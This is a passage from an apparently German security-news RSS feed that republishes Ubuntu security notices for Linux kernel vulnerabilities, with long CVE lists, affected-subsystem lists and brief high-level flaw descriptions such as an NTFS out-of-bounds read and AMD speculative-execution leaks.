CVE-2026-23277, CVE-2026-23279, CVE-2026-23281, CVE-2026-23286,
CVE-2026-23289, CVE-2026-23290, CVE-2026-23291, CVE-2026-23293,
CVE-2026-23296, CVE-2026-23298, CVE-2026-23300, CVE-2026-23303,
CVE-2026-23304, CVE-2026-23307, CVE-2026-23312, CVE-2026-23318,
CVE-2026-23324, CVE-2026-23335, CVE-2026-23336, CVE-2026-23339,
CVE-2026-23340, CVE-2026-23352, CVE-2026-23356, CVE-2026-23357,
CVE-2026-23359, CVE-2026-23362, CVE-2026-23365, CVE-2026-23367,
CVE-2026-23368, CVE-2026-23370, CVE-2026-23372, CVE-2026-23379,
CVE-2026-23381, CVE-2026-23382, CVE-2026-23388, CVE-2026-23391,
CVE-2026-23392, CVE-2026-23395, CVE-2026-23396, CVE-2026-23397,
CVE-2026-23398, CVE-2026-23399, CVE-2026-23401, CVE-2026-23420,
CVE-2026-23434, CVE-2026-23438, CVE-2026-23439, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23452, CVE-2026-23454,
CVE-2026-23456, CVE-2026-23457, CVE-2026-23458, CVE-2026-23460,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23474, CVE-2026-31393,
CVE-2026-31396, CVE-2026-31399, CVE-2026-31400, CVE-2026-31405,
CVE-2026-31407, CVE-2026-31408, CVE-2026-31409, CVE-2026-31411,
CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31427, CVE-2026-31428, CVE-2026-31433, CVE-2026-31446,
CVE-2026-31447, CVE-2026-31450, CVE-2026-31452, CVE-2026-31454,
CVE-2026-31455, CVE-2026-31464, CVE-2026-31466, CVE-2026-31467,
CVE-2026-31469, CVE-2026-31473, CVE-2026-31476, CVE-2026-31480,
CVE-2026-31483, CVE-2026-31485, CVE-2026-31489, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31497, CVE-2026-31498, CVE-2026-31507,
CVE-2026-31508, CVE-2026-31509, CVE-2026-31510, CVE-2026-31512,
CVE-2026-31515, CVE-2026-31518, CVE-2026-31521, CVE-2026-31522,
CVE-2026-31523, CVE-2026-31524, CVE-2026-31532, CVE-2026-31540,
CVE-2026-31545, CVE-2026-31546, CVE-2026-31549, CVE-2026-31550,
CVE-2026-31551, CVE-2026-31552, CVE-2026-31555, CVE-2026-31565,
CVE-2026-31570, CVE-2026-31576, CVE-2026-31577, CVE-2026-31578,
CVE-2026-31580, CVE-2026-31581, CVE-2026-31583, CVE-2026-31585,
CVE-2026-31586, CVE-2026-31588, CVE-2026-31590, CVE-2026-31594,
CVE-2026-31596, CVE-2026-31597, CVE-2026-31598, CVE-2026-31599,
CVE-2026-31602, CVE-2026-31603, CVE-2026-31605, CVE-2026-31615,
CVE-2026-31616, CVE-2026-31617, CVE-2026-31618, CVE-2026-31619,
CVE-2026-31622, CVE-2026-31623, CVE-2026-31624, CVE-2026-31625,
CVE-2026-31626, CVE-2026-31627, CVE-2026-31628, CVE-2026-31629,
CVE-2026-31630, CVE-2026-31634, CVE-2026-31642, CVE-2026-31651,
CVE-2026-31656, CVE-2026-31658, CVE-2026-31660, CVE-2026-31661,
CVE-2026-31662, CVE-2026-31664, CVE-2026-31665, CVE-2026-31667,
CVE-2026-31670, CVE-2026-31671, CVE-2026-31672, CVE-2026-31673,
CVE-2026-31674, CVE-2026-31676, CVE-2026-31679, CVE-2026-31680,
CVE-2026-31681, CVE-2026-31683, CVE-2026-31684, CVE-2026-31686,
CVE-2026-31687, CVE-2026-31694, CVE-2026-31695, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31701,
CVE-2026-31716, CVE-2026-31720, CVE-2026-31721, CVE-2026-31726,
CVE-2026-31728, CVE-2026-31737, CVE-2026-31738, CVE-2026-31747,
CVE-2026-31748, CVE-2026-31749, CVE-2026-31751, CVE-2026-31752,
CVE-2026-31754, CVE-2026-31755, CVE-2026-31756, CVE-2026-31758,
CVE-2026-31759, CVE-2026-31761, CVE-2026-31762, CVE-2026-31763,
CVE-2026-31770, CVE-2026-31773, CVE-2026-31778, CVE-2026-31780,
CVE-2026-31781, CVE-2026-31788, CVE-2026-43014, CVE-2026-43015,
CVE-2026-43020, CVE-2026-43024, CVE-2026-43026, CVE-2026-43027,
CVE-2026-43028, CVE-2026-43030, CVE-2026-43032, CVE-2026-43035,
CVE-2026-43040, CVE-2026-43041, CVE-2026-43043, CVE-2026-43046,
CVE-2026-43047, CVE-2026-43050, CVE-2026-43051, CVE-2026-43052,
CVE-2026-43054, CVE-2026-43058, CVE-2026-43060, CVE-2026-43061,
CVE-2026-43062, CVE-2026-43065, CVE-2026-43066, CVE-2026-43068,
CVE-2026-43069, CVE-2026-43074, CVE-2026-43075, CVE-2026-43076,
CVE-2026-43079, CVE-2026-43080, CVE-2026-43085, CVE-2026-43089,
CVE-2026-43093, CVE-2026-43098, CVE-2026-43099, CVE-2026-43103,
CVE-2026-43104, CVE-2026-43105, CVE-2026-43110, CVE-2026-43111,
CVE-2026-43112, CVE-2026-43113, CVE-2026-43123, CVE-2026-43124,
CVE-2026-43130, CVE-2026-43132, CVE-2026-43133, CVE-2026-43134,
CVE-2026-43135, CVE-2026-43136, CVE-2026-43139, CVE-2026-43140,
CVE-2026-43141, CVE-2026-43145, CVE-2026-43147, CVE-2026-43148,
CVE-2026-43149, CVE-2026-43152, CVE-2026-43156, CVE-2026-43158,
CVE-2026-43159, CVE-2026-43163, CVE-2026-43168, CVE-2026-43171,
CVE-2026-43180, CVE-2026-43182, CVE-2026-43183, CVE-2026-43184,
CVE-2026-43187, CVE-2026-43190, CVE-2026-43194, CVE-2026-43196,
CVE-2026-43200, CVE-2026-43202, CVE-2026-43203, CVE-2026-43205,
CVE-2026-43206, CVE-2026-43207, CVE-2026-43209, CVE-2026-43211,
CVE-2026-43218, CVE-2026-43223, CVE-2026-43225, CVE-2026-43226,
CVE-2026-43227, CVE-2026-43230, CVE-2026-43231, CVE-2026-43232,
CVE-2026-43233, CVE-2026-43236, CVE-2026-43241, CVE-2026-43242,
CVE-2026-43246, CVE-2026-43251, CVE-2026-43255, CVE-2026-43257,
CVE-2026-43261, CVE-2026-43262, CVE-2026-43264, CVE-2026-43266,
CVE-2026-43268, CVE-2026-43269, CVE-2026-43270, CVE-2026-43273,
CVE-2026-43275, CVE-2026-43277, CVE-2026-43279, CVE-2026-43281,
CVE-2026-43283, CVE-2026-43287, CVE-2026-43289, CVE-2026-43291,
CVE-2026-43295, CVE-2026-43296, CVE-2026-43302, CVE-2026-43312,
CVE-2026-43313, CVE-2026-43314, CVE-2026-43315, CVE-2026-43316,
CVE-2026-43324, CVE-2026-43327, CVE-2026-43328, CVE-2026-43329,
CVE-2026-43333, CVE-2026-43334, CVE-2026-43336, CVE-2026-43339,
CVE-2026-43340, CVE-2026-43342, CVE-2026-43343, CVE-2026-43357,
CVE-2026-43363, CVE-2026-43365, CVE-2026-43370, CVE-2026-43373,
CVE-2026-43380, CVE-2026-43381, CVE-2026-43382, CVE-2026-43386,
CVE-2026-43387, CVE-2026-43405, CVE-2026-43411, CVE-2026-43420,
CVE-2026-43425, CVE-2026-43426, CVE-2026-43427, CVE-2026-43428,
CVE-2026-43429, CVE-2026-43430, CVE-2026-43432, CVE-2026-43439,
CVE-2026-43445, CVE-2026-43449, CVE-2026-43450, CVE-2026-43451,
CVE-2026-43452, CVE-2026-43453, CVE-2026-43458, CVE-2026-43459,
CVE-2026-43466, CVE-2026-43469, CVE-2026-43472, CVE-2026-43473,
CVE-2026-43475, CVE-2026-43476, CVE-2026-43480, CVE-2026-43484,
CVE-2026-43496, CVE-2026-43497, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45838, CVE-2026-45839,
CVE-2026-45840, CVE-2026-45841, CVE-2026-45842, CVE-2026-45843,
CVE-2026-45844, CVE-2026-45846, CVE-2026-45847, CVE-2026-45848,
CVE-2026-45852, CVE-2026-45856, CVE-2026-45857, CVE-2026-45860,
CVE-2026-45862, CVE-2026-45864, CVE-2026-45866, CVE-2026-45867,
CVE-2026-45868, CVE-2026-45869, CVE-2026-45870, CVE-2026-45871,
CVE-2026-45873, CVE-2026-45875, CVE-2026-45879, CVE-2026-45883,
CVE-2026-45885, CVE-2026-45890, CVE-2026-45891, CVE-2026-45899,
CVE-2026-45902, CVE-2026-45904, CVE-2026-45911, CVE-2026-45912,
CVE-2026-45915, CVE-2026-45916, CVE-2026-45919, CVE-2026-45920,
CVE-2026-45924, CVE-2026-45935, CVE-2026-45936, CVE-2026-45941,
CVE-2026-45946, CVE-2026-45948, CVE-2026-45954, CVE-2026-45956,
CVE-2026-45958, CVE-2026-45960, CVE-2026-45964, CVE-2026-45965,
CVE-2026-45968, CVE-2026-45969, CVE-2026-45970, CVE-2026-45974,
CVE-2026-45978, CVE-2026-45983, CVE-2026-45984, CVE-2026-45985,
CVE-2026-45986, CVE-2026-45987, CVE-2026-45994, CVE-2026-46002,
CVE-2026-46004, CVE-2026-46006, CVE-2026-46009, CVE-2026-46015,
CVE-2026-46018, CVE-2026-46019, CVE-2026-46022, CVE-2026-46023,
CVE-2026-46024, CVE-2026-46027, CVE-2026-46033, CVE-2026-46037,
CVE-2026-46040, CVE-2026-46044, CVE-2026-46046, CVE-2026-46047,
CVE-2026-46049, CVE-2026-46050, CVE-2026-46051, CVE-2026-46053,
CVE-2026-46062, CVE-2026-46064, CVE-2026-46070, CVE-2026-46072,
CVE-2026-46077, CVE-2026-46080, CVE-2026-46082, CVE-2026-46088,
CVE-2026-46098, CVE-2026-46099, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46107, CVE-2026-46108, CVE-2026-46112, CVE-2026-46120,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46127,
CVE-2026-46128, CVE-2026-46132, CVE-2026-46133, CVE-2026-46137,
CVE-2026-46146, CVE-2026-46149, CVE-2026-46150, CVE-2026-46151,
CVE-2026-46161, CVE-2026-46163, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46172, CVE-2026-46174, CVE-2026-46177, CVE-2026-46178,
CVE-2026-46184, CVE-2026-46186, CVE-2026-46187, CVE-2026-46189,
CVE-2026-46197, CVE-2026-46198, CVE-2026-46205, CVE-2026-46206,
CVE-2026-46209, CVE-2026-46212, CVE-2026-46214, CVE-2026-46219,
CVE-2026-46220, CVE-2026-46227, CVE-2026-46230, CVE-2026-46231,
CVE-2026-46233, CVE-2026-46234, CVE-2026-46236, CVE-2026-46238,
CVE-2026-46249, CVE-2026-46250, CVE-2026-46253, CVE-2026-46259,
CVE-2026-46267, CVE-2026-46270, CVE-2026-46273, CVE-2026-46274,
CVE-2026-46275, CVE-2026-46285, CVE-2026-46294, CVE-2026-46301,
CVE-2026-46303, CVE-2026-46304, CVE-2026-46307, CVE-2026-46319,
CVE-2026-46328, CVE-2026-52911, CVE-2026-52912, CVE-2026-52914,
CVE-2026-52915, CVE-2026-52916, CVE-2026-52919, CVE-2026-52920,
CVE-2026-52921, CVE-2026-52922, CVE-2026-52925, CVE-2026-52926,
CVE-2026-52931, CVE-2026-52954, CVE-2026-52955, CVE-2026-52957,
CVE-2026-52958, CVE-2026-52962, CVE-2026-52963, CVE-2026-52969,
CVE-2026-52970, CVE-2026-52982, CVE-2026-52984, CVE-2026-52985,
CVE-2026-52986, CVE-2026-52992, CVE-2026-52993, CVE-2026-52995,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53006, CVE-2026-53011,
CVE-2026-53012, CVE-2026-53016, CVE-2026-53021, CVE-2026-53022,
CVE-2026-53023, CVE-2026-53037, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53043, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53059, CVE-2026-53060, CVE-2026-53061, CVE-2026-53062,
CVE-2026-53064, CVE-2026-53065, CVE-2026-53068, CVE-2026-53069,
CVE-2026-53071, CVE-2026-53072, CVE-2026-53073, CVE-2026-53074,
CVE-2026-53075, CVE-2026-53077, CVE-2026-53082, CVE-2026-53088,
CVE-2026-53093, CVE-2026-53096, CVE-2026-53112, CVE-2026-53128,
CVE-2026-53130, CVE-2026-53287, CVE-2026-53291, CVE-2026-53294,
CVE-2026-53295, CVE-2026-53296, CVE-2026-53304, CVE-2026-53306,
CVE-2026-53309, CVE-2026-53320, CVE-2026-53369, CVE-2026-53379,
CVE-2026-63860, CVE-2026-63865, CVE-2026-64018, CVE-2026-64032,
CVE-2026-64033, CVE-2026-64034, CVE-2026-64039, CVE-2026-64046,
CVE-2026-64047, CVE-2026-64055, CVE-2026-64056, CVE-2026-64083,
CVE-2026-64084, CVE-2026-64085, CVE-2026-64086, CVE-2026-64087,
CVE-2026-64088, CVE-2026-64089, CVE-2026-64096, CVE-2026-64102,
CVE-2026-64103, CVE-2026-64113, CVE-2026-64114, CVE-2026-64115,
CVE-2026-64125, CVE-2026-64133, CVE-2026-64135, CVE-2026-64153,
CVE-2026-64155, CVE-2026-64164, CVE-2026-64165, CVE-2026-64166,
CVE-2026-64168, CVE-2026-64173, CVE-2026-64174, CVE-2026-64177,
CVE-2026-64178, CVE-2026-64179, CVE-2026-64185, CVE-2026-64218,
CVE-2026-64219, CVE-2026-64220, CVE-2026-64221)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8623-1: Linux kernel (NVIDIA) vulnerabilities]]></title>
<description><![CDATA[Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - Arm Firmware Framework for ARMv8-A(FFA);
(CVE-2026-53354, CVE-2026-64520)]]></description>
<link>https://tsecurity.de/de/3698761/unix-server/usn-8623-1-linux-kernel-nvidia-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698761/unix-server/usn-8623-1-linux-kernel-nvidia-vulnerabilities/</guid>
<pubDate>Mon, 03 Aug 2026 00:13:04 +0200</pubDate>
<content:encoded><![CDATA[Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - Arm Firmware Framework for ARMv8-A(FFA);
(CVE-2026-53354, CVE-2026-64520)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8622-1: Linux kernel (NVIDIA) vulnerabilities]]></title>
<description><![CDATA[Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - Arm Firmware Framework for ARMv8-A(FFA);
(CVE-2026-53354, CVE-2026-64520)]]></description>
<link>https://tsecurity.de/de/3698762/unix-server/usn-8622-1-linux-kernel-nvidia-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698762/unix-server/usn-8622-1-linux-kernel-nvidia-vulnerabilities/</guid>
<pubDate>Mon, 03 Aug 2026 00:13:04 +0200</pubDate>
<content:encoded><![CDATA[Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - Arm Firmware Framework for ARMv8-A(FFA);
(CVE-2026-53354, CVE-2026-64520)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8620-2: Linux kernel (Azure FIPS) vulnerabilities]]></title>
<description><![CDATA[Maxim Suhanov discovered that the NTFS file system implementation in the
Linux kernel did not properly validate file name length in certain
situations, leading to an out-of-bounds read. An attacker could use this to
construct a malicious NTFS image that, when mounted and operated on, could
expose...]]></description>
<link>https://tsecurity.de/de/3698763/unix-server/usn-8620-2-linux-kernel-azure-fips-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698763/unix-server/usn-8620-2-linux-kernel-azure-fips-vulnerabilities/</guid>
<pubDate>Mon, 03 Aug 2026 00:13:04 +0200</pubDate>
<content:encoded><![CDATA[Maxim Suhanov discovered that the NTFS file system implementation in the
Linux kernel did not properly validate file name length in certain
situations, leading to an out-of-bounds read. An attacker could use this to
construct a malicious NTFS image that, when mounted and operated on, could
expose sensitive information (kernel memory). (CVE-2023-45896)

It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM32 architecture;
  - ARM64 architecture;
  - MIPS architecture;
  - PowerPC architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - ACPI drivers;
  - ATM drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - RNBD block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - TPM device driver;
  - Clocksource drivers;
  - Data acquisition framework and drivers;
  - CPU frequency scaling framework;
  - CPU idle management framework;
  - Hardware crypto device drivers;
  - DMA engine subsystem;
  - Arm Firmware Framework for ARMv8-A(FFA);
  - EFI core;
  - GPIO subsystem;
  - GPU drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO subsystem;
  - IIO ADC drivers;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IOMMU subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Multifunction device drivers;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Power supply drivers;
  - RapidIO drivers;
  - Remote Processor subsystem;
  - RPMSG subsystem;
  - SCSI subsystem;
  - Freescale SoC drivers;
  - Texas Instruments SoC drivers;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - Framebuffer layer;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FAT file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - JFS file system;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Proc file system;
  - Pstore file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - UDF file system;
  - XFS file system;
  - Audit subsystem;
  - RAS (Reliability, Availability, Serviceability) subsystem;
  - Software nodes and device properties;
  - Memory Management;
  - KVM subsystem;
  - Memory management;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Network traffic control;
  - Bluetooth subsystem;
  - MAC80211 subsystem;
  - Netfilter;
  - IP tunnels definitions;
  - Tracing infrastructure;
  - User-space API (UAPI);
  - io_uring subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - Kernel kexec() syscall;
  - Kernel module support;
  - Scheduler infrastructure;
  - Cryptographic library;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - Networking core;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Phonet protocol;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - AppArmor security module;
  - Simplified Mandatory Access Control Kernel framework;
  - ALSA framework;
  - FireWire sound drivers;
  - HD-audio driver;
  - AudioScience HPI driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - SoC audio core drivers;
  - STI ASoC drivers;
  - USB sound devices;
(CVE-2022-49803, CVE-2022-49961, CVE-2022-50073, CVE-2022-50116,
CVE-2022-50552, CVE-2023-52682, CVE-2023-52737, CVE-2023-53545,
CVE-2023-53596, CVE-2023-53629, CVE-2024-27389, CVE-2024-35865,
CVE-2024-36898, CVE-2024-36922, CVE-2024-41079, CVE-2024-46715,
CVE-2024-46770, CVE-2024-47809, CVE-2024-50012, CVE-2024-53221,
CVE-2024-56557, CVE-2024-56584, CVE-2024-56657, CVE-2024-56719,
CVE-2024-56727, CVE-2025-21712, CVE-2025-21739, CVE-2025-21863,
CVE-2025-22107, CVE-2025-23141, CVE-2025-37786, CVE-2025-38006,
CVE-2025-38105, CVE-2025-38192, CVE-2025-38250, CVE-2025-38562,
CVE-2025-38626, CVE-2025-38659, CVE-2025-38710, CVE-2025-39748,
CVE-2025-39764, CVE-2025-40005, CVE-2025-40016, CVE-2025-40103,
CVE-2025-40323, CVE-2025-68206, CVE-2025-68239, CVE-2025-68256,
CVE-2025-68307, CVE-2025-68358, CVE-2025-71150, CVE-2025-71161,
CVE-2025-71221, CVE-2025-71232, CVE-2025-71233, CVE-2025-71235,
CVE-2025-71236, CVE-2025-71237, CVE-2025-71238, CVE-2025-71239,
CVE-2025-71265, CVE-2025-71266, CVE-2025-71267, CVE-2025-71274,
CVE-2025-71287, CVE-2025-71292, CVE-2025-71304, CVE-2026-23031,
CVE-2026-23066, CVE-2026-23100, CVE-2026-23113, CVE-2026-23141,
CVE-2026-23157, CVE-2026-23169, CVE-2026-23204, CVE-2026-23220,
CVE-2026-23221, CVE-2026-23222, CVE-2026-23227, CVE-2026-23228,
CVE-2026-23229, CVE-2026-23234, CVE-2026-23235, CVE-2026-23236,
CVE-2026-23237, CVE-2026-23238, CVE-2026-23241, CVE-2026-23242,
CVE-2026-23243, CVE-2026-23253, CVE-2026-23266, CVE-2026-23270,
CVE-2026-23277, CVE-2026-23279, CVE-2026-23281, CVE-2026-23286,
CVE-2026-23289, CVE-2026-23290, CVE-2026-23291, CVE-2026-23293,
CVE-2026-23296, CVE-2026-23298, CVE-2026-23300, CVE-2026-23303,
CVE-2026-23304, CVE-2026-23307, CVE-2026-23312, CVE-2026-23318,
CVE-2026-23324, CVE-2026-23335, CVE-2026-23336, CVE-2026-23339,
CVE-2026-23340, CVE-2026-23352, CVE-2026-23356, CVE-2026-23357,
CVE-2026-23359, CVE-2026-23362, CVE-2026-23365, CVE-2026-23367,
CVE-2026-23368, CVE-2026-23370, CVE-2026-23372, CVE-2026-23379,
CVE-2026-23381, CVE-2026-23382, CVE-2026-23388, CVE-2026-23391,
CVE-2026-23392, CVE-2026-23395, CVE-2026-23396, CVE-2026-23397,
CVE-2026-23398, CVE-2026-23399, CVE-2026-23401, CVE-2026-23420,
CVE-2026-23434, CVE-2026-23438, CVE-2026-23439, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23452, CVE-2026-23454,
CVE-2026-23456, CVE-2026-23457, CVE-2026-23458, CVE-2026-23460,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23474, CVE-2026-31393,
CVE-2026-31396, CVE-2026-31399, CVE-2026-31400, CVE-2026-31405,
CVE-2026-31407, CVE-2026-31408, CVE-2026-31409, CVE-2026-31411,
CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31427, CVE-2026-31428, CVE-2026-31433, CVE-2026-31446,
CVE-2026-31447, CVE-2026-31450, CVE-2026-31452, CVE-2026-31454,
CVE-2026-31455, CVE-2026-31464, CVE-2026-31466, CVE-2026-31467,
CVE-2026-31469, CVE-2026-31473, CVE-2026-31476, CVE-2026-31480,
CVE-2026-31483, CVE-2026-31485, CVE-2026-31489, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31497, CVE-2026-31498, CVE-2026-31507,
CVE-2026-31508, CVE-2026-31509, CVE-2026-31510, CVE-2026-31512,
CVE-2026-31515, CVE-2026-31518, CVE-2026-31521, CVE-2026-31522,
CVE-2026-31523, CVE-2026-31524, CVE-2026-31532, CVE-2026-31540,
CVE-2026-31545, CVE-2026-31546, CVE-2026-31549, CVE-2026-31550,
CVE-2026-31551, CVE-2026-31552, CVE-2026-31555, CVE-2026-31565,
CVE-2026-31570, CVE-2026-31576, CVE-2026-31577, CVE-2026-31578,
CVE-2026-31580, CVE-2026-31581, CVE-2026-31583, CVE-2026-31585,
CVE-2026-31586, CVE-2026-31588, CVE-2026-31590, CVE-2026-31594,
CVE-2026-31596, CVE-2026-31597, CVE-2026-31598, CVE-2026-31599,
CVE-2026-31602, CVE-2026-31603, CVE-2026-31605, CVE-2026-31615,
CVE-2026-31616, CVE-2026-31617, CVE-2026-31618, CVE-2026-31619,
CVE-2026-31622, CVE-2026-31623, CVE-2026-31624, CVE-2026-31625,
CVE-2026-31626, CVE-2026-31627, CVE-2026-31628, CVE-2026-31629,
CVE-2026-31630, CVE-2026-31634, CVE-2026-31642, CVE-2026-31651,
CVE-2026-31656, CVE-2026-31658, CVE-2026-31660, CVE-2026-31661,
CVE-2026-31662, CVE-2026-31664, CVE-2026-31665, CVE-2026-31667,
CVE-2026-31670, CVE-2026-31671, CVE-2026-31672, CVE-2026-31673,
CVE-2026-31674, CVE-2026-31676, CVE-2026-31679, CVE-2026-31680,
CVE-2026-31681, CVE-2026-31683, CVE-2026-31684, CVE-2026-31686,
CVE-2026-31687, CVE-2026-31694, CVE-2026-31695, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31701,
CVE-2026-31716, CVE-2026-31720, CVE-2026-31721, CVE-2026-31726,
CVE-2026-31728, CVE-2026-31737, CVE-2026-31738, CVE-2026-31747,
CVE-2026-31748, CVE-2026-31749, CVE-2026-31751, CVE-2026-31752,
CVE-2026-31754, CVE-2026-31755, CVE-2026-31756, CVE-2026-31758,
CVE-2026-31759, CVE-2026-31761, CVE-2026-31762, CVE-2026-31763,
CVE-2026-31770, CVE-2026-31773, CVE-2026-31778, CVE-2026-31780,
CVE-2026-31781, CVE-2026-31788, CVE-2026-43014, CVE-2026-43015,
CVE-2026-43020, CVE-2026-43024, CVE-2026-43026, CVE-2026-43027,
CVE-2026-43028, CVE-2026-43030, CVE-2026-43032, CVE-2026-43035,
CVE-2026-43040, CVE-2026-43041, CVE-2026-43043, CVE-2026-43046,
CVE-2026-43047, CVE-2026-43050, CVE-2026-43051, CVE-2026-43052,
CVE-2026-43054, CVE-2026-43058, CVE-2026-43060, CVE-2026-43061,
CVE-2026-43062, CVE-2026-43065, CVE-2026-43066, CVE-2026-43068,
CVE-2026-43069, CVE-2026-43074, CVE-2026-43075, CVE-2026-43076,
CVE-2026-43079, CVE-2026-43080, CVE-2026-43085, CVE-2026-43089,
CVE-2026-43093, CVE-2026-43098, CVE-2026-43099, CVE-2026-43103,
CVE-2026-43104, CVE-2026-43105, CVE-2026-43110, CVE-2026-43111,
CVE-2026-43112, CVE-2026-43113, CVE-2026-43123, CVE-2026-43124,
CVE-2026-43130, CVE-2026-43132, CVE-2026-43133, CVE-2026-43134,
CVE-2026-43135, CVE-2026-43136, CVE-2026-43139, CVE-2026-43140,
CVE-2026-43141, CVE-2026-43145, CVE-2026-43147, CVE-2026-43148,
CVE-2026-43149, CVE-2026-43152, CVE-2026-43156, CVE-2026-43158,
CVE-2026-43159, CVE-2026-43163, CVE-2026-43168, CVE-2026-43171,
CVE-2026-43180, CVE-2026-43182, CVE-2026-43183, CVE-2026-43184,
CVE-2026-43187, CVE-2026-43190, CVE-2026-43194, CVE-2026-43196,
CVE-2026-43200, CVE-2026-43202, CVE-2026-43203, CVE-2026-43205,
CVE-2026-43206, CVE-2026-43207, CVE-2026-43209, CVE-2026-43211,
CVE-2026-43218, CVE-2026-43223, CVE-2026-43225, CVE-2026-43226,
CVE-2026-43227, CVE-2026-43230, CVE-2026-43231, CVE-2026-43232,
CVE-2026-43233, CVE-2026-43236, CVE-2026-43241, CVE-2026-43242,
CVE-2026-43246, CVE-2026-43251, CVE-2026-43255, CVE-2026-43257,
CVE-2026-43261, CVE-2026-43262, CVE-2026-43264, CVE-2026-43266,
CVE-2026-43268, CVE-2026-43269, CVE-2026-43270, CVE-2026-43273,
